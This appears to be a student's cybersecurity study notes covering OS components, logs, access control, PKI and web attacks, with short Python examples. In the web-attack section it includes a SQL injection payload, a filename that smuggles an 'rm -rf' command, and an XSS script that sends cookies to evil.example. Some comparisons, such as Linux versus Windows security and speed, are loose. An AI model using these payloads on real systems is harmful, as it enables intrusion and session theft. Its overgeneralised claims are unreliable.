Assignment Cs 1 (1) 3 (1) 4


1. Identify components of an operating system (such as Windows and Linux) in a given scenario

Windows Operating System

Processes: A process is an executing program. One or more threads run in the context of the process.

Thread: A thread is the basic unit to which the operating system allocates processor time. A
thread can execute any part of the process code, including parts currently being
executed by another thread.

Memory allocation: The task of fulfilling an allocation request consists of locating a block of unused memory of sufficient size. Memory requests are satisfied by allocating portions from a large pool of memory called the heap or free store. Heaps are memory set aside for dynamic allocation. Stacks are memory set aside as spare space for a thread of execution. Volatile memory loses its contents when the computer loses power; nonvolatile memory holds data with or without power. With dynamic memory allocation, the program allocates memory at run time; with static allocation, memory is allocated at compile time.

Windows Registry: Windows stores its configuration information in a database called the registry. The registry contains profiles for each user of the computer and information about system hardware, installed programs, and property settings. Windows continually references this information during its operation.
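For illustration, a value can be read from the registry with Python's standard winreg module (Windows only); the key path and value name below are common examples rather than part of any particular scenario:

    import winreg  # standard library module, available on Windows only

    # Open a well-known key under HKEY_LOCAL_MACHINE (read-only access).
    key_path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        # Read a single named value; returns (data, registry_type).
        product_name, value_type = winreg.QueryValueEx(key, "ProductName")
        print("Windows product name:", product_name)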

WMI: Windows Management Instrumentation (WMI) is a set of specifications from Microsoft for consolidating the management of devices and applications in a network from Windows computing systems. WMI is the Microsoft implementation of Web-Based Enterprise Management (WBEM), which is built on the Common Information Model (CIM), a computer industry standard for defining device and application characteristics so that system administrators and management programs can control devices and applications from multiple manufacturers or sources in the same way.

Handles: An object is a data structure that represents a system resource, such as a file,
thread, or graphic image. An application cannot directly access object data or the
system resource that an object represents. Instead, an application must obtain an
object handle, which it can use to examine or modify the system resource. Each
handle has an entry in an internally maintained table. These entries contain the
addresses of the resources and the means to identify the resource type.

Services: Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions.
These services can be automatically started when the computer boots, can be paused
and restarted, and do not show any user interface. These features make services ideal
for use on a server or whenever you need long-running functionality that does not
interfere with other users who are working on the same computer. You can also run
services in the security context of a specific user account that is different from the
logged-on user or the default computer account. For more information about services
and Windows sessions, see the Windows SDK documentation in the MSDN Library.
A Windows service is a computer program that operates in the background.

Linux Operating System


Processes: An instance of a program that is being executed. Each process has a unique
PID, which is that process’s entry in the kernel’s process table.
Fork: creates a new process by duplicating the calling process. The new process is
referred to as the child process. The calling process is referred to as the parent
process.
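A minimal sketch of fork() from Python on a Linux system, showing the parent and child processes and their PIDs:

    import os

    pid = os.fork()  # duplicates the calling process (POSIX systems only)
    if pid == 0:
        # Child process: fork() returned 0 here.
        print(f"child: my PID is {os.getpid()}, my parent is {os.getppid()}")
    else:
        # Parent process: fork() returned the child's PID here.
        print(f"parent: my PID is {os.getpid()}, I created child {pid}")
        os.waitpid(pid, 0)  # wait for the child so it does not become a zombie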

Permissions: a system to control the ability of the users and processes to view or make
changes to the contents of the filesystem.

Symlink: A symbolic link (symlink) is a file that contains a reference to another file or
directory in the form of an absolute or relative path and that affects pathname
resolution.
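A short sketch of permissions and symlinks driven from Python; the file names used here are made up for illustration:

    import os
    import stat

    # Create a throwaway file so the example is self-contained.
    with open("secrets.txt", "w") as f:
        f.write("api-token=abc123\n")

    # Permissions: restrict the file so only its owner can read and write it (chmod 600).
    os.chmod("secrets.txt", stat.S_IRUSR | stat.S_IWUSR)

    # Symlink: create a link whose contents are just a path pointing at the real file.
    os.symlink("secrets.txt", "secrets-link")
    print(os.readlink("secrets-link"))   # prints the stored target path: secrets.txt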

Daemon: In multitasking computer operating systems, a daemon is a computer program that runs as a background process, rather than being under the direct control of an interactive user.

Linux Operating System


Linux is a free and open-source operating system created and designed by Linus Torvalds in 1991.
Linux is a derived form of Unix. It is free of cost, making it available to all users. It is open source, which means that the source code of Linux is available to all users. Users can add additional programs or modify the existing ones so that it can perform various other functions.
 Linux uses a monolithic kernel. It runs both kernel and user services in the same address
space. It has many distributions such as Ubuntu, Linux mint, Fedora, etc.
 Linux was written in C language and assembly language. It is more machine-oriented than user-friendly, which means new users can find it difficult to interact with Linux.
 Linux has become the largest open-source software project in the world. It provides high security and is widely used for security and penetration-testing work.
 Some of the features of Linux include its Portability, Security, and Multitasking abilities. Plus,
Linux is open source.
Some of the drawbacks of using the Linux operating system are listed below −
 It cannot run most Windows programs.
 Most Internet service providers do not support Linux.
 Linux is difficult to learn for most new users. Depending on the distribution, the difficulty
level varies.
Windows Operating System
Windows is an operating system developed by Microsoft. Its first version was released in 1985 as an extension of MS-DOS.
 Windows is not open-source. Its free version lacks some of the features that the licensed
version has.
 Windows is the most widely used operating system in PCs. It provides a GUI which is very
user-friendly. It is available in two versions, i.e., 32 bit and 64 bit. It has both client and server
versions.
 Windows uses a hybrid kernel. Its address space is separated into kernel space and user space. Windows is designed in such a way that people with no programming knowledge can also use it.
 It is good for both personal and commercial use because it is very simple and easy to use.
 Windows was written in C++ and Assembly language. Windows provides less security as
compared to Linux.
 Some of the features of Windows include: Control panel, File explorer, Internet Browser, Disk
cleanup features, and a highly user friendly Interface.
Some of the drawbacks of using the Windows operating system are listed below −
 Most of the Windows features are available only in the paid/licensed version.
 It provides less security.
 It has high system requirements.
 Users have to pay a software fee along with the license fee.
Differences: Linux and Windows Operating Systems
The following table highlights the major differences between the Linux and Windows operating
systems −

Definition
  Linux: Linux is an open-source operating system developed for desktops.
  Windows: Windows is an operating system developed for desktops.

Developed by
  Linux: Linus Torvalds
  Windows: Microsoft

Availability
  Linux: Open-source and free of cost.
  Windows: Not open-source; it is paid.

Ease of use
  Linux: Linux is machine-friendly, so the user must have some exposure to Linux commands. It takes more time for users to get used to Linux.
  Windows: Windows is simple with rich GUI options. The user does not need any knowledge of programming. It is more useful for non-technical users.

Kernel type
  Linux: Monolithic kernel
  Windows: Hybrid kernel

Path separator
  Linux: Forward slash is used as the path separator.
  Windows: Backslash is used as the path separator.

Security
  Linux: Linux is more secure than Windows.
  Windows: Windows is less secure compared to Linux.

Case sensitivity
  Linux: Linux is highly case-sensitive.
  Windows: Windows is not case-sensitive.

Updates
  Linux: Linux updates less frequently.
  Windows: Windows updates frequently.

Written in
  Linux: Linux is written in C and assembly language.
  Windows: Windows is written in C++ and assembly language.

License
  Linux: Linux is distributed under the GPL (GNU General Public License).
  Windows: Windows is distributed under a proprietary commercial software license.

Reliability
  Linux: Linux is more reliable than Windows as it is more secure.
  Windows: Windows is not as reliable as Linux.

File system
  Linux: Linux uses a tree structure to store files; in Linux everything is considered a file.
  Windows: Windows uses drives such as C, D, and E, and folders to store files.

Types of users
  Linux: Regular, Administrative, Service
  Windows: Administrator, Standard, Child, Guest

Speed
  Linux: Linux is faster than Windows.
  Windows: Windows is slower compared to Linux.

Command line
  Linux: The command line is referred to as a Terminal, which is very useful and can perform various tasks.
  Windows: Windows also has a command prompt, which is not as effective as the Terminal; users mostly use the GUI to perform their tasks.

Installation
  Linux: Linux installation is a bit complicated to set up but takes less time to install.
  Windows: Windows is easy to set up but takes more time to install.

2. Interpret operating system, application, or command line logs to identify an event

Event Viewer logs every event that occurs on your computer from the moment you first boot
it up. Logged events include those related to programs installed on the computer, system
performance, and security.

For Windows, you can use the Event Viewer utility to view and analyze the logs
from the operating system and applications such as SQL Server or IIS. The logs
use a structured data format, making them easy to search and filter. You can also
use a text editor such as Notepad++ to open log files in text format, such as IIS access logs.

For Mac, you can use the Terminal app to read log files using the command line,
or the Console app to view and navigate the logs using a graphical interface. The
Console app shows different categories of logs, such as system reports, user
reports, and console errors. You can also use a text editor such as TextEdit to
open log files in text format.

For Linux, you can use the command line to read log files from various locations,
such as /var/log, /var/log/syslog, or /var/log/messages. You can use commands
such as cat, tail, grep, or less to view and filter the log files. You can also use a
text editor such as vi or nano to open log files in text format.

To identify an event from a log file, you need to look at the timestamp, the
source, the event ID, the message, and the severity level of each log entry. The
timestamp tells you when the event occurred, the source tells you which
application or service generated the event, the event ID tells you what type of
event it is, the message tells you what happened or what caused the event, and
the severity level tells you how critical or important the event is. For example, an
error level event indicates a problem that needs attention, while an information
level event indicates a normal operation.
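As a rough sketch of that idea, the snippet below parses one syslog-style line and pulls out the timestamp, source, severity, and message; the sample line and field layout are assumptions, since real log formats vary:

    import re

    # Example line in a common syslog-like layout (hypothetical sample).
    line = "2024-05-01T10:32:45 sshd[1023]: error: Failed password for invalid user admin"

    # timestamp, source process, optional severity keyword, message text
    pattern = re.compile(
        r"^(?P<timestamp>\S+)\s+(?P<source>[\w.-]+)\[\d+\]:\s+"
        r"(?:(?P<severity>error|warning|info):\s+)?(?P<message>.*)$"
    )

    match = pattern.match(line)
    if match:
        event = match.groupdict()
        event["severity"] = event["severity"] or "info"   # default when not present
        print(event["timestamp"], event["source"], event["severity"], event["message"])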

3. Describe management concepts:


A. Asset Management
What is Asset Management?
Asset management describes managing money on clients’ behalf. The financial institutions
managing the money are called asset managers, and they develop and execute investment
strategies that create value for their clients. Broadly, this process involves “putting money to
work” by buying, holding, and selling financial assets with the potential to achieve a client’s
investment goals. Examples of financial assets include stocks, bonds, commodities, shares in
private funds, and more.

Most importantly, asset management firms are “fiduciaries.” This means that, unlike other
parts of the financial services industry, asset management clients provide full trading
authority — also known as “discretion” — of their funds to their asset manager. In turn,
asset managers are legally required to act in their client’s best interests.

The top five asset management firms globally are:

1. BlackRock (USA)
2. Vanguard Group (USA)
3. Fidelity Investments (USA)
4. State Street Global Advisors (USA)
5. Morgan Stanley (USA)

Generally, asset management is the process of optimizing the value, use, and maintenance of physical and intangible assets, such as equipment and buildings, and of balancing the costs, risks, and benefits of owning and operating assets throughout their life cycle. Asset management can help organizations achieve their strategic goals, reduce operational expenses, enhance asset performance, and comply with regulations.

Key Highlights

 Asset management firms manage and invest funds for large institutional clients, like global
corporations, sovereign wealth funds, and not-for-profit organizations.
 Wealth management firms offer financial and investment advisory services to high-net-
worth individuals and families.
 Large national banks will typically offer both lines of business, and the client base is what
segments the fiduciary part of the business.

B. Configuration management
Configuration Management is the process of maintaining systems, such as computer hardware and
software, in a desired state. Configuration Management (CM) is also a method of ensuring that systems
perform in a manner consistent with expectations over time.
Configuration management: This is the process of establishing and maintaining
consistency of a product’s performance, functional, and physical attributes with its
requirements, design, and operational information throughout its life. Configuration
management verifies that a product performs as intended and is identified and
documented in sufficient detail to support its projected life cycle. Configuration
management helps to manage changes to the product, ensure quality and reliability,
and avoid errors or defects

Definition of configuration management: Configuration management means managing work results that belong together, also known as configurations.

The five CM functions are:

Configuration Management Planning and Management.

Configuration Identification.

Configuration Change Management.

Configuration Status Accounting.

Configuration Verification and Audit.

C. Path management

A critical path in project management is the longest sequence of activities that must be finished on time
in order for the entire project to be complete. Any delays in critical tasks will delay the rest of the
project

Path management: This is the process of planning, scheduling, monitoring, and controlling the activities and resources that are required to complete a project or achieve a goal. Path management involves identifying the critical path of a project, which is the sequence of tasks that determines the minimum time needed to finish the project. Path management also involves managing the dependencies, constraints, risks, and uncertainties that may affect the project's progress and outcome.
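A small worked example of the critical-path idea in Python, using an invented set of tasks, durations, and dependencies:

    from functools import lru_cache

    # Hypothetical tasks: name -> (duration in days, list of prerequisite tasks)
    tasks = {
        "design":  (3, []),
        "build":   (5, ["design"]),
        "test":    (2, ["build"]),
        "docs":    (1, ["design"]),
        "release": (1, ["test", "docs"]),
    }

    @lru_cache(maxsize=None)
    def earliest_finish(name):
        # Longest path (in days) from project start to the end of this task.
        duration, deps = tasks[name]
        return duration + max((earliest_finish(d) for d in deps), default=0)

    # The critical path length is the largest earliest-finish value of any task.
    print("minimum project duration:", max(earliest_finish(t) for t in tasks), "days")
    # design(3) -> build(5) -> test(2) -> release(1) = 11 days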

D. Mobile device management

Mobile device management: This is the process of distributing and applying updates to software on mobile devices, such as smartphones, tablets, laptops, or wearables. Mobile device management also involves securing, monitoring, and controlling the access and usage of mobile devices within an organization. Mobile device management can help organizations enhance productivity, efficiency, and collaboration among employees who use mobile devices for work purposes.
E. Vulnerability management

Vulnerability management is a continuous, proactive, and often automated process that keeps your
computer systems, networks, and enterprise applications safe from cyber attacks and data breaches.
As such, it is an important part of an overall security program. By identifying, assessing, and
addressing potential security weaknesses, organizations can help prevent attacks and minimize
damage if one does occur.

The goal of vulnerability management is to reduce the organization's overall risk exposure by
mitigating as many vulnerabilities as possible. This can be a challenging task, given the number of
potential vulnerabilities and the limited resources available for remediation. Vulnerability
management should be a continuous process to keep up with new and emerging threats and
changing environments.

 Vulnerability management: This is the process of discovering, prioritizing, and resolving security vulnerabilities in an organization's IT infrastructure and software. Security
vulnerabilities are any flaws or weaknesses that hackers can exploit to launch
cyberattacks or gain unauthorized access to systems or data. Vulnerability management
involves scanning systems and networks for vulnerabilities, assessing their severity and
impact, applying patches or mitigations to fix them, and monitoring their status.

4. Identify protected data in a network: PII, PSI, PHI, and intellectual property

Protected data is data that contains sensitive or confidential information that must be
safeguarded from unauthorized access, use, or disclosure. Protected data can include
personal, financial, health, or intellectual property information that belongs to
individuals or organizations. Depending on the type and context of the data, different
laws and regulations may apply to protect the data and ensure its privacy and security.
Protected data in a network are:
1. Personally Identifiable Information
What is Personally Identifiable Information (PII)?
Personally Identifiable Information (PII) is any information that can be used to identify, locate, or
contact a specific individual. PII can include both sensitive and non-sensitive data. PII is regulated by
various privacy laws and standards worldwide, such as the Privacy Act in the US and the General
Data Protection Regulation (GDPR) in the European Union.

Common PII Examples

 Full name
 Social security number
 Passport number
 Driver’s license number
 Email address and phone number

2. Protected Sensitive Information

 PSI: Protected Sensitive Information. This is data that is not classified as PII, but still
requires protection from unauthorized access or disclosure due to its sensitivity or
confidentiality. Examples of PSI include employee performance reviews, salary
information, trade secrets, business plans, customer lists, etc. PSI may be subject to
contractual obligations, non-disclosure agreements, or internal policies that restrict its
access and use.

3. Protected Health Information


What is Protected Health Information (PHI)?
Protected Health Information (PHI) refers to any information related to an individual’s health status,
healthcare provision, or payment for healthcare services. This data is typically collected, stored, and
transmitted by healthcare providers and insurance companies. The Health Insurance Portability and
Accountability Act (HIPAA) sets the guidelines for the proper handling of PHI in the United States.

PHI: Protected Health Information. This is data that relates to the past, present, or future
physical or mental health or condition of an individual, the provision of health care to an
individual, or the payment for the provision of health care to an individual. Examples of
PHI include medical records, diagnoses, prescriptions, test results, insurance information,
etc

Common PHI Examples

 Medical records and patient charts
 Billing information
 Health insurance policy numbers
 Test results and diagnoses
 Prescriptions

4. Intellectual property: This is data that represents the creations of the mind, such
as inventions, artistic works, designs, symbols, names, images, etc. Examples of
intellectual property include patents, trademarks, copyrights, trade secrets, etc.
Intellectual property is protected by various laws and treaties that grant exclusive
rights to the owners or creators of the data.

5. Compare and contrast access control models


A. Discretionary access control

Discretionary access control (DAC) is a type of security access control that grants or restricts object access via
an access policy determined by an object’s owner group and/or subjects. DAC mechanism controls are defined
by user identification with supplied credentials during authentication, such as username and password. DACs
are discretionary because the subject (owner) can transfer authenticated objects or information access to other
users. In other words, the owner determines object access privileges.

In contrast to MAC, discretionary access control models describe a system in which any user
granted access permissions by an administrator can edit and share those permissions with other
members of an organization. This means that once the end user has access to a location or a digital
system, they’re able to grant the same privileges to any other person at their own personal
discretion.

B. Mandatory access control

Mandatory access control is the strictest configuration organizations can deploy in which
all access decisions are made by one individual with the authority to confirm or deny permissions.
This model is commonly used by organizations with high-level security needs, like government
agencies and financial institutions, as access to confidential areas and data must be highly
controlled and traceable.

Mandatory access control vs. discretionary access control models
In terms of discretionary access control vs. mandatory access control, these two models differ
greatly. MAC models rely heavily on admin configuring access parameters based on predetermined
rules and organizational roles, providing more security though often proving time-consuming to
implement.

DAC models instead provide users with some individual control over their data, with staff able to
grant permissions at their own discretion. This makes DAC systems incredibly flexible and scalable.
However, as credentials can be shared freely amongst staff, DAC models are known to present
some exploitable security risks.

C. Nondiscretionary access control

An access control policy that is uniformly enforced across all subjects and
objects within the boundary of an information system. A subject that has been
granted access to information is constrained from doing any of the following: (i)
passing the information to unauthorized subjects or objects; (ii) granting its
privileges to other subjects; (iii) changing one or more security attributes on
subjects, objects, the information system, or system components; (iv) choosing
the security attributes to be associated with newly-created or modified objects;
or (v) changing the rules governing access control. Organization-defined subjects
may explicitly be granted organization-defined privileges (i.e., they are trusted
subjects) such that they are not limited by some or all of the above constraints.

In general, all access control policies other than DAC are grouped in the category of non-discretionary access
control (NDAC).

The following are excerpts from NIST IR:

 “Mandatory access control (MAC) policy means that access control policy decisions are made by a central
authority, not by the individual owner of an object, and the owner cannot change access rights.” MAC is
just one of the many forms of NDAC, so the central authority is not the critical criteria to distinguish DAC
from NDAC.
 “Although RBAC is technically a form of non-discretionary access control, recent computer security texts
often list RBAC as one of the three primary access control policies (the others are DAC and MAC).”
 “Temporal constraints are formal statements of access policies that involve time-based restrictions on
access to resources; they are required in several application scenarios. Popular access control policies related
to temporal constraints are the history-based access control policies.” The Brewer and Nash model
(Chinese Wall) is history-based.

D. Authentication, authorization, accounting

AAA stands for authentication, authorization, and accounting. AAA is a framework for intelligently controlling access to computer resources, enforcing policies, auditing usage, and providing the information necessary to bill for services.

In this article, we'll cover the Authentication, Authorization, and Accounting (AAA) framework for cybersecurity, the meaning of each AAA component, and the benefits of using it for granular access control. You'll learn about different AAA protocols and how they relate to Identity and Access Management (IAM). By the end of this article, you'll fully understand AAA networking and how the model assists with network security and monitoring.

What is Authentication, Authorization, and Accounting (AAA)?

Authentication, Authorization, and Accounting (AAA) is a three-process framework used to manage user access, enforce user policies and privileges, and measure the consumption of network resources.
The AAA system works in three chronological and dependent steps, where one must
take place before the next can begin. These AAA protocols are typically run on a
server that performs all three functions automatically. This enables IT management
teams to easily maintain network security and ensure that users have the resource
access they need to perform their jobs.

Authentication

Authentication is the process of identifying a user and granting them access to the
network. Most of the time, this is done through traditional username and password
credentials. However, users could also use passwordless authentication methods,
including biometrics like eye scans or fingerprints, and hardware such as hardware
tokens or smart cards.

The server evaluates the credentials submitted by the user against those stored in the network's database. Many enterprises use Active Directory as the database to store and analyze those credentials.

Authorization

After authentication, the authorization process enforces the network policies, granular access control, and user privileges. The cybersecurity AAA protocol
determines which specific network resources the user has permission to access,
such as a particular application, database, or online service. It also establishes the
tasks and activities that users can perform within those authorized resources.
For example, after the system grants access to the network, a user who works in
sales may only be able to use the customer relationship management (CRM)
software and not the human resources or enterprise resource planning systems.
Additionally, within the CRM, they might only be allowed to view and edit data and
not manage other users. It's the authorization process that would enforce all of these
network rules.

Accounting

Accounting, the final process in the framework, is all about measuring what's
happening within the network. As part of the protocol, it will collect and log data on
user sessions, such as length of time, type of session, and resource usage. The
value here is that it offers a clear audit trail for compliance and business purposes.

Accounting helps in both security and operational evaluations. For instance, network
administrators can look at user access privileges to specific resources to see about
any changes. They could also adjust capacity based on the resources most
frequently used and common activity trends.
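A toy sketch of the three AAA steps running in order; the users, passwords, and permissions are invented, and a real deployment would use a protocol such as RADIUS or TACACS+ on a dedicated server:

    import time

    USERS = {"alice": "s3cret"}          # authentication data (plaintext only for illustration)
    PERMISSIONS = {"alice": {"crm"}}     # authorization data (hypothetical)
    AUDIT_LOG = []                       # accounting records

    def authenticate(username, password):
        return USERS.get(username) == password

    def authorize(username, resource):
        return resource in PERMISSIONS.get(username, set())

    def account(username, resource, allowed):
        AUDIT_LOG.append({"time": time.time(), "user": username,
                          "resource": resource, "allowed": allowed})

    def access(username, password, resource):
        if not authenticate(username, password):     # step 1: who are you?
            return "authentication failed"
        allowed = authorize(username, resource)      # step 2: what may you do?
        account(username, resource, allowed)         # step 3: record what happened
        return "granted" if allowed else "denied"

    print(access("alice", "s3cret", "crm"))   # granted
    print(access("alice", "s3cret", "hr"))    # denied, but still logged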

E. Rule-based access control

Rule-based access control is used to manage access to locations, databases and devices according to a set of predetermined rules and permissions that do not account for the individual's role within the organization. In other words, if the user does not meet a set of predefined access criteria, they will be locked out of the access control network regardless of their level of security clearance.
Rule-based access control and role-based access control (both commonly abbreviated RBAC) are two different approaches to managing access control in computer systems. Here is a comparison and contrast between the two:

1. Definition:
- Rule-Based Access Control: RBAC is an access control model where access
decisions are based on predefined rules or policies. Each rule specifies a condition
or set of conditions that must be met for access to be granted.
- Role-Based Access Control: RBAC is an access control model where access
decisions are based on the roles assigned to users. Users are assigned specific
roles, and access permissions are associated with these roles.

2. Granularity:
- Rule-Based Access Control: RBAC provides a fine-grained level of access control
as access decisions are made based on specific conditions defined in the rules. This
allows for more precise control over access permissions.
- Role-Based Access Control: RBAC provides a coarse-grained level of access
control as access decisions are made based on the roles assigned to users. Users
with the same role have the same access permissions, which may not be as precise
as rule-based access control.

3. Flexibility:
- Rule-Based Access Control: RBAC offers more flexibility as access control
decisions can be tailored to specific conditions defined in the rules. This allows for
dynamic changes in access permissions based on changing conditions.
- Role-Based Access Control: RBAC offers less flexibility as access control decisions
are tied to predefined roles. Changes in access permissions require modifying the
role assignments, which may not be as dynamic or granular as rule-based access
control.

4. Complexity:
- Rule-Based Access Control: RBAC can be more complex to implement and
manage due to the need to define and maintain a large number of rules. It requires
careful consideration of all possible conditions and their corresponding access
decisions.
- Role-Based Access Control: RBAC is generally simpler to implement and manage
as it relies on assigning roles to users and associating access permissions with these
roles. It provides a more structured and organized approach to access control.

In summary, rule-based access control offers fine-grained control and flexibility but
can be more complex, while role-based access control provides a simpler and more
structured approach but offers less granularity and flexibility. The choice between the
two depends on the specific requirements and complexity of the access control
needs in a given system.
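To make the contrast concrete, here is a small Python sketch of both models; the roles, rules, and users are invented:

    from datetime import datetime

    # Role-based: permissions hang off a user's role.
    ROLE_PERMISSIONS = {"sales": {"crm:read", "crm:write"}, "hr": {"hr:read"}}
    USER_ROLES = {"alice": "sales"}

    def role_based_allowed(user, permission):
        return permission in ROLE_PERMISSIONS.get(USER_ROLES.get(user), set())

    # Rule-based: each rule is a condition evaluated per request, regardless of role.
    RULES = [
        lambda req: req["resource"] != "crm" or 9 <= req["time"].hour < 17,  # office hours only
        lambda req: req["source_ip"].startswith("10."),                      # internal network only
    ]

    def rule_based_allowed(request):
        return all(rule(request) for rule in RULES)

    print(role_based_allowed("alice", "crm:write"))       # True: her role grants it
    print(rule_based_allowed({"resource": "crm",
                              "time": datetime(2024, 5, 1, 22, 0),
                              "source_ip": "10.0.0.5"}))  # False: outside office hours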
F. Time-based access control

 A Time-Based Access-List (ACL) is a set of rules used to filter traffic passing through a router or switch based on date and time parameters. It is an extended version of an Access Control List (ACL), which normally filters incoming and outgoing traffic only based on source IP address, destination IP address and port numbers.
 With a time-based ACL, you can refine this filtering based on specific dates
and times. In other words, it allows you to configure the router or switch so that
traffic from specific sources is only allowed at certain times.

G. Role-based access control

Role-based access control is an operational configuration for physical and cyber entry point management designed to grant access permissions based only on the role of the user within an organization. Simply put, levels of access are determined by the user's job title rather than other predefined rules such as time, frequency of use or other similarly measurable variables.
6. Describe in detail the impact of certificates on security (including PKI, public/private keys crossing the network, and asymmetric/symmetric encryption).

 PKI – Public key infrastructure is a set of roles, policies, hardware, software and procedures to create, manage, distribute, store, use and revoke digital certificates to manage public-key encryption. It is used to facilitate the secure electronic transfer of information for network activities. PKI binds public keys to the identities of people, applications, and organizations. This "binding" is maintained by the issuance and management of digital certificates by a certificate authority.
 Public/private keys crossing the network – A key pair is a set of two keys that work in combination with each other as a team. Key pairs consist of one public and one private key. Public keys are shared with everyone; the private key is never shared. The private key is the only key that can decrypt data encrypted by the public key.
 Asymmetric/symmetric – Asymmetric encryption uses the above public/private key pairing system. The private key is the only key that can decrypt data encrypted by the public key, and vice versa. Symmetric encryption is different: the same key is used on both sides of the conversation, to both encrypt and decrypt.


PKI is a framework that enables the creation, distribution, and management of certificates and public keys. PKI consists of several components, such as:

 Certificate authorities (CAs): These are entities that issue and revoke certificates. CAs can
be public or private, depending on who they serve and trust. For example, public CAs
are trusted by web browsers and operating systems to issue certificates for websites,
while private CAs are used by organizations to issue certificates for their internal
networks or applications.

 Registration authorities (RAs): These are entities that assist CAs in validating the identity
and credentials of certificate applicants. RAs can be part of the CA or separate entities
that act as intermediaries between the CA and the applicants.
Certificates play a crucial role in ensuring security in various aspects of digital communication
and information exchange. They are primarily used in Public Key Infrastructure (PKI) systems, which
involve the use of public and private keys for encryption and decryption.

One of the key impacts of certificates is their ability to establish trust between parties involved in a
communication. Certificates are issued by trusted third-party entities known as Certificate Authorities
(CAs). These CAs validate the identity of individuals, organizations, or devices requesting a certificate,
ensuring that they are who they claim to be. This process helps in preventing impersonation or fraud.

Certificates are particularly important in securing data while crossing a network. When data is
transmitted over a network, it is vulnerable to interception and tampering. By using certificates,
encryption algorithms, and secure protocols, such as Transport Layer Security (TLS), data can be
encrypted before transmission. Certificates are used to authenticate the server and client involved in the
communication, ensuring that the data is securely transmitted between trusted entities.

Asymmetric and symmetric encryption algorithms are commonly used in conjunction with certificates to
ensure security. Asymmetric encryption involves the use of a pair of keys: a public key for encryption
and a private key for decryption. Certificates contain the public key of an entity, which can be freely
shared with others. This allows secure communication where data encrypted with the public key can
only be decrypted using the corresponding private key, which is kept secret by the entity.

Symmetric encryption, on the other hand, uses a single key for both encryption and decryption. While
symmetric encryption is faster than asymmetric encryption, securely exchanging the symmetric key
between parties becomes a challenge. Certificates come into play here by facilitating the secure
exchange of symmetric keys. The symmetric key can be encrypted using the recipient's public key and
securely transmitted alongside the encrypted data. The recipient can then use their private key to
decrypt the symmetric key and use it for decrypting the data.
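A condensed sketch of that hybrid pattern using the third-party Python cryptography package; the key size and message are illustrative, and in practice the recipient's public key would be taken from their certificate:

    from cryptography.hazmat.primitives.asymmetric import rsa, padding
    from cryptography.hazmat.primitives import hashes
    from cryptography.fernet import Fernet

    # Recipient's key pair; the public half would normally be published in a certificate.
    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()

    # A symmetric key encrypts the bulk data quickly...
    sym_key = Fernet.generate_key()
    ciphertext = Fernet(sym_key).encrypt(b"confidential report")

    # ...and the symmetric key itself is wrapped with the recipient's public key.
    oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    wrapped_key = public_key.encrypt(sym_key, oaep)

    # Only the holder of the private key can unwrap the symmetric key and read the data.
    recovered_key = private_key.decrypt(wrapped_key, oaep)
    print(Fernet(recovered_key).decrypt(ciphertext))   # b'confidential report'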

In summary, certificates have a profound impact on security in various aspects of digital communication.
They enable trust between parties involved in a communication, secure the transmission of data over
networks, prevent unauthorized access, and ensure the authenticity and integrity of the parties
involved. PKI systems, with the help of certificates, form the backbone of secure communication in
today's digital world

7. Discuss in detail web application attacks, such as SQL injection, command injection, and cross-site scripting

Web application attacks are malicious activities that target web applications by
exploiting vulnerabilities in their design or implementation. These attacks can result in
unauthorized access, data theft, or other harmful consequences. Some of the common
types of web application attacks are:
SQL injection attack
SQL injection is a common and prevalent method of attack that targets victims' databases through web applications.
It enables cyberattackers to access, modify, or delete data, and thus manipulate the organization's databases. For any
organization, data is one of the most critical and valuable assets, and an attack on its database can wreak havoc on
the entire business.

Data can include customer records, privileged or personal information, business-critical data, confidential data, or
financial records of an organization.

According to MITRE ATT&CK, cyberattackers often exploit public-facing applications to gain the initial foothold
within an organization's network. These applications are generally websites but can also include databases like SQL.
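A minimal sketch of the vulnerability and its standard fix, using Python's built-in sqlite3 module; the table, column, and sample data are made up:

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

    user_input = "' OR '1'='1"   # a classic injection payload

    # Vulnerable: the input is pasted into the SQL string, changing the query's logic.
    unsafe = f"SELECT * FROM users WHERE name = '{user_input}'"
    print(conn.execute(unsafe).fetchall())        # returns every row

    # Safe: a parameterized query treats the input purely as data, never as SQL.
    safe = "SELECT * FROM users WHERE name = ?"
    print(conn.execute(safe, (user_input,)).fetchall())   # returns nothing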
What Is Command Injection?

Command injection is a cyber attack wherein an attacker takes control of the host operating system by
injecting code into a vulnerable application through a command. This code is executed regardless of any
security mechanism and can be used to steal data, crash systems, damage databases, and even install
malware that can be used later.

Attackers can access a target system through command injection by using various methods and
techniques. The attacker runs arbitrary commands in the system shell of the web server that can
compromise all relevant data.
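A small sketch of the same pattern at the shell level in Python; the filename input is hypothetical:

    import subprocess

    filename = "report.txt; rm -rf /tmp/important"   # attacker-controlled input

    # Vulnerable: shell=True hands the whole string to the shell, so the ';'
    # starts a second, attacker-chosen command.
    # subprocess.run(f"cat {filename}", shell=True)

    # Safer: pass an argument list with no shell; the input is only ever a filename.
    subprocess.run(["cat", filename], check=False)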


Cross-site scripting
Cross-site scripting (XSS) attack is a popular attack technique used by hackers to target web applications. Here, the
attackers inject malicious client-side scripts into a user's browsers or web pages, allowing them to download
malware into the target user's system, impersonate the target, and carry out data exfiltration, session hijacking,
changes in user settings, and more.

According to MITRE ATT&CK, cross-site scripting is an example of a drive-by compromise technique used by
adversaries to gain initial access within the network. The technique aims to exploit website vulnerabilities through
malicious client side scripts or code. This provides them with access to systems on the internal network and also
allows them to use compromised websites to direct the victims to malicious applications meant to steal and acquire
Application Access Tokens (used to make authorized and legitimate API requests on behalf of users/services to
access resources in cloud or SaaS applications).
There are three types of XSS attacks:

- Stored XSS: The malicious script is permanently stored on the target server and served to users who
access the affected page.
- Reflected XSS: The malicious script is embedded in a URL or input field, and the server reflects it back in
the response.

- DOM-based XSS: The malicious script manipulates the Document Object Model (DOM) of a web page,
leading to script execution.
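A tiny sketch of the core defense, output encoding, using Python's standard html module; the comment text is a made-up payload:

    import html

    # Attacker-supplied comment containing a script payload.
    comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

    # Vulnerable: inserting the raw comment into a page lets the browser run the script.
    unsafe_page = f"<p>{comment}</p>"

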